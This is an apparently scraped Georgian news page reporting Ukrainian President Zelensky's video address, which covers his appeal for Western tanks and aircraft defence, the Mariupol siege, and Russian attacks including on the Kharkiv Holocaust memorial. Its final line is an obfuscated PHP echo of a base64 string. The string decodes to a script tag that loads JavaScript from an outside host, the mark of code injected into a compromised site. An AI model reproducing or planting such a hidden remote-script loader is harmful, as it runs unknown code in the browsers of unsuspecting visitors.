celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ დღის შემაჯამებელ ვიდეომიმართვაში უკრაინის სამხედრო ტექნიკით დახმარების აუცილებლობაზე ისაუბრა და აღნიშნა, უკრაინელებს არ შეუძლიათ იარაღით ჩამოაგდონ თვითმფრინავები, ხოლო მარიუპოლი ტანკების გარეშე დაიხსნან ალყიდან.
 
 
"ჩვენი თავდაცვისა და საგარეო საქმეთა მინისტრები დღეს ამერიკელ კოლეგებს შეხვდნენ. მოლაპარაკებებს შეუერთდა პრეზიდენტი ჯო ბაიდენიც. როგორც შემატყობინეს საუბარი შეეხო სიცოცხლისთვის მნიშვნელოვან იმ საკითხებს, რომლებსაც მე ყოველდღიურად ვაჟღერებ, სანამ დასავლეთში პინკ-პონკს თამაშობენ, რომელი გაგვიწევს სამხედრო დახმარებას.
 
უკრაინელებს არ შეუძლიათ იარაღით ჩამოაგდონ თვითმფრინავები, ხოლო მარიუპოლი ტანკების გარეშე დაიხსნან ალყიდან. ამის შესახებ იცის თითოეულმა უკრაინელმა ჯარისკაცმა, ასევე იციან ევროპაშიც და ამერიკაშიც, თუმცა მალე უნდა გაიაზრონ.
 
ჩვენდა საბედნიეროდ ხელში ჩავიგდეთ რამდენიმე რუსული ტანკი.  უკრაინის პოზიცია უნდა მოისმინონ მთელს მსოფლიოში რადგან ამ პოზიციას ეთანხმება ევროპის თითოეული მოქალაქე. თუ ვინმეს ჩემი არ სჯერა, ჩატარებული სოციოლოგიური გამოკითხვების შედეგებს გაეცნოს. თუ არ გინდათ ხალხის მოსმენა, მაშინ პოლონეთის საზღვრებთან აფეთქებული რუსული ჭურვების  ხმას მოუსმინეთ. 
 
რუსეთმა უნდა გაიგოს, რომ მის მიერ წარმოებულ პროპაგანდას მომავალი არ აქვს . ჩვენ ვმუშაობთ მათი სიცრუის მანქანის წინააღმდეგ მსოფლიოს მასშტაბით. სიმართლე არ დაიმალება და ამას მსოფლიო ძალიან მალე დაინახავს. რუსეთის ქმედებები ეხება არამხოლოდ უკრაინას და მის განადგურებას, არამედ მსოფლიო უსაფრთხოების პრინციპებს, მორალსა და ადამიანობას. 
 
ოკუპანტებმა ისტორიის წინააღმდეგ მორიგი სამხედრო დანაშაული ჩაიდინეს. მათ ხარკოვში თავიანთი არაადამიანური სტილით ჰოლოკოსტის მემორიალის „დენაციფიკაცია მოახდინეს“. ეს ის ადგილია, სადაც ნაცისტებმა მეორე მსოფლიო ომის დროს, 20 ათასამდე ადამიანი დახვრიტეს. 80 წლის შემდეგ იგივეს აკეთებს რუსეთიც. 
 
რუსი ოკუპანტები მიზანმიმართულად ბომბავენ დასახლებულ პუნტქებს, სახლებს, საავადმყოფოებსა და თავშესაფრებს. ასევე არ ინდობენ არც ეკლესიებს და ისტორიულ ძეგლებს.  რუს სამხედროებს მსგავს ბრძანებებს მეთაურები აძლევენ. და ეს ყველაფერი ჩვენს ერს კიდევ უფრო ძლიერ ერად, ჩვენს მოქალაქეებს კიდევ უფრო ძლიერ მოქალაქეებად, ჩვენს კულტურას კიდევ უფრო ძლიერ კულტურად აქცევს. 
 
80 წლის წინ, ნაცისტები ევროპის დასაპყრობად ზუსტად ანალოგიურ ხერხს იყენებდნენ. მათ ამ ქმედებას არავინ არა აპატიებს. იქნება პასუხისმგებლობაც ზუსტად ისე, როგორც 76 წლის წინ ფაშისტები დაისაჯნენ. ეს შეიძლება არ იყოს ნიურბერგი, მაგრამ იქნება ანალოგი და ყველა დაინახავს." – განაცხადა ვოლოდიმირ ზელენსკი. 
830
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");